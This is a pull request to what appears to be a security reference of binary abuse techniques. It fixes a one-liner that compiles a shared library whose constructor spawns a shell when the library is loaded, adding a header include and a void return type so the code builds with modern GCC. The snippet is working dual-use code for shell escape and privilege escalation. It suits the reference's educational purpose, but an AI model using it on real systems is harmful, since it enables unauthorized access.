### PR TITLE
Fix library-load snippet compilation

### DIFF
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -145,7 +145,8 @@ library-load:
       As an example, the following can be used to create a minimal shared library (`lib.so`) that spawns a shell upon loading:
 
       ```
-      echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
+      echo '#include <unistd.h>
+      __attribute__((constructor)) void init() { execl("/bin/sh", "sh", 0); }' \
           | gcc -w -fPIC -shared -o lib.so -x c -
       ```
 


### PR DESCRIPTION
The library-load example currently fails to compile with modern GCC versions.

This updates the snippet to:
- explicitly declare `init()` as returning `void`
- include `<unistd.h>` for the `execl()` declaration

Tested against the compilation errors reported in #588
Fixes #588 